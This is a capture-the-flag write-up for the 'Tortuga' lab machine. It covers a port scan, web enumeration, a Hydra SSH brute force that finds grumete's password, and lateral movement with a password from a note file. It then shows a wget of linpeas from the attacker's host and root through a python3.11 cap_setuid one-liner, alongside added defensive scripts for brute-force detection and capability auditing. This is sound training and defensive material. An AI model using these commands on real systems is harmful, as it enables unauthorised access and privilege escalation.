Tortuga

Information Gathering

Target: 192.168.100.51

Port Scan

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.51
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.51:80
Open 192.168.100.51:22
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-23 12:40 +0800
Initiating ARP Ping Scan at 12:40
Scanning 192.168.100.51 [1 port]
Completed ARP Ping Scan at 12:40, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:40
Completed Parallel DNS resolution of 1 host. at 12:40, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 12:40
Scanning 192.168.100.51 [2 ports]
Discovered open port 80/tcp on 192.168.100.51
Discovered open port 22/tcp on 192.168.100.51
Completed SYN Stealth Scan at 12:40, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.51
Host is up, received arp-response (0.00075s latency).
Scanned at 2026-03-23 12:40:09 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:D6:F0:16 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)


Enumerating 80/tcp

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# gobuster dir -u http://192.168.100.51/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,htmldir
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.51/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt,php,htmldir
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
mapa.php (Status: 200) [Size: 922]
server-status (Status: 403) [Size: 279]
Progress: 882232 / 882232 (100.00%)
===============================================================
Finished
===============================================================

SSH Brute Force

mapa.php may contain a username.

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -l grumete -P /usr/share/wordlists/rockyou.txt 192.168.100.51 ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-23 12:46:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.100.51:22/
[STATUS] 222.00 tries/min, 222 tries in 00:01h, 14344179 to do in 1076:54h, 14 active
[STATUS] 218.67 tries/min, 656 tries in 00:03h, 14343746 to do in 1093:17h, 13 active
[22][ssh] host: 192.168.100.51 login: grumete password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-23 12:51:32

Username: grumete

Password: 1234
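
Seen from the defending side, the Hydra run above appears in the sshd log as a burst of failed password attempts followed by one success. The script below is an added example, not part of the original write-up; it assumes syslog-format sshd lines, and the sample log and the address 192.168.100.60 are constructed.

```shell
#!/usr/bin/env bash
# Added example: spot sshd password guessing, and logins that succeed after it.
# Reads syslog-format sshd lines on stdin (the format is an assumption).
# $1 = failures per source IP and user needed before reporting (default 5).
detect_ssh_bruteforce() {
  awk -v threshold="${1:-5}" '
    function parse(   i) {            # sets user and ip from "... USER from IP ..."
      for (i = 2; i < NF; i++) if ($i == "from") { user = $(i-1); ip = $(i+1) }
    }
    / sshd\[[0-9]+\]: Failed password for / {
      parse(); fails[ip SUBSEP user]++; next
    }
    / sshd\[[0-9]+\]: Accepted password for / {
      parse(); key = ip SUBSEP user
      if (fails[key] >= threshold) {  # success right after a guessing burst
        printf "COMPROMISED %s %s after_failures=%d\n", ip, user, fails[key]
        reported[key] = 1
      }
      next
    }
    END {
      for (key in fails) {
        if (fails[key] < threshold || (key in reported)) continue
        split(key, part, SUBSEP)
        printf "BRUTEFORCE %s %s failures=%d\n", part[1], part[2], fails[key]
      }
    }'
}

# Constructed sample log: six failures and then a success from one source,
# plus one unrelated failure that stays below the threshold.
sample_log() {
  for i in 1 2 3 4 5 6; do
    echo "Mar 23 12:46:2$i TheHackersLabs-Tortuga sshd[90$i]: Failed password for grumete from 192.168.100.47 port 4000$i ssh2"
  done
  echo "Mar 23 12:47:01 TheHackersLabs-Tortuga sshd[910]: Failed password for invalid user admin from 192.168.100.60 port 50022 ssh2"
  echo "Mar 23 12:51:30 TheHackersLabs-Tortuga sshd[977]: Accepted password for grumete from 192.168.100.47 port 40100 ssh2"
}

sample_log | detect_ssh_bruteforce 5
```

On a real host, feed it /var/log/auth.log or the output of journalctl -u ssh. The lasting fix for this box is key-only authentication (PasswordAuthentication no in sshd_config), so that a password like 1234 is never accepted.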

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# ssh grumete@192.168.100.51
The authenticity of host '192.168.100.51 (192.168.100.51)' can't be established.
ED25519 key fingerprint is: SHA256:rxn+MnWRoccfZtz9D7UjHk7lURB6CknxYKX3SMQmp34
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.100.51' (ED25519) to the list of known hosts.
grumete@192.168.100.51's password:
Linux TheHackersLabs-Tortuga 6.1.0-38-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.147-1 (2025-08-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Sep 5 11:44:07 2025 from 192.168.1.5
grumete@TheHackersLabs-Tortuga:~$
grumete@TheHackersLabs-Tortuga:~$

Privilege Escalation

grumete -> capitan

The file .nota.txt in the home directory contains a password.

Move laterally to the capitan user.

User: capitan

Password: mar_de_fuego123

capitan -> root

Upload linpeas and run a scan.

capitan@TheHackersLabs-Tortuga:~$ busybox wget http://192.168.100.47:9999/linpeas.sh
Connecting to 192.168.100.47:9999 (192.168.100.47:9999)
saving to 'linpeas.sh'
linpeas.sh 100% |************************************************************************************| 952k 0:00:00 ETA
'linpeas.sh' saved
capitan@TheHackersLabs-Tortuga:~$ ls
linpeas.sh
capitan@TheHackersLabs-Tortuga:~$ chmod +x linpeas.sh
capitan@TheHackersLabs-Tortuga:~$ bash linpeas.sh

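Privilege escalation through capabilities is possible.

cap_setuid=ep

ep means the capability is in the file's effective and permitted sets, which allows the program to call the setuid() system call and switch its own UID to any user (including root).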

https://hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-capabilities.html?highlight=Capabilities#cap_setuid

/usr/bin/python3.11 -c 'import os; os.setuid(0); os.system("/bin/bash")'
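
The same finding from the defending side: the script below is an added example (not from the original write-up) that reads getcap -r output and reports binaries whose file capabilities allow escalation, rating interpreters such as python3.11 as critical. The capability and interpreter lists are this example's own selection, the sample input is constructed, and /usr/local/bin/backup and /usr/bin/tool are hypothetical paths.

```shell
#!/usr/bin/env bash
# Added example: audit file capabilities for root-equivalent grants.
# Live use:     getcap -r / 2>/dev/null | flag_risky_caps
# Remediation:  setcap -r <path>   (removes all file capabilities from <path>)
flag_risky_caps() {
  awk '
    BEGIN {
      # Capabilities that commonly lead to root (selection is an assumption).
      risky  = "^cap_(setuid|setgid|sys_admin|sys_ptrace|sys_module|dac_override|dac_read_search|chown|fowner)$"
      # General-purpose interpreters turn such a grant into arbitrary code as root.
      interp = "/(python|perl|ruby|php|lua)[0-9.]*$|/(node|bash|dash|sh|gdb|vim)$"
    }
    NF >= 2 {
      found = ""
      for (f = 2; f <= NF; f++) {
        clause = $f                                   # e.g. cap_setuid=ep or cap_setuid+ep
        if (!match(clause, /[=+][eip]+$/)) continue   # also skips the bare "=" of old getcap
        flags = substr(clause, RSTART + 1)
        caps  = substr(clause, 1, RSTART - 1)
        if (flags !~ /[ep]/) continue                 # inheritable-only grants nothing by itself
        n = split(caps, c, ",")
        for (i = 1; i <= n; i++) {
          if (c[i] !~ risky) continue
          sep = (found == "" ? "" : ",")
          found = found sep c[i]
        }
      }
      if (found != "")
        printf "%s %s %s\n", ($1 ~ interp ? "CRITICAL" : "HIGH"), $1, found
    }'
}

# Constructed getcap output covering the new and the old output layout.
sample_getcap() {
  cat <<EOF
/usr/bin/python3.11 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/local/bin/backup = cap_dac_read_search+ep
/usr/bin/tool cap_setuid=i
EOF
}

sample_getcap | flag_risky_caps
```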
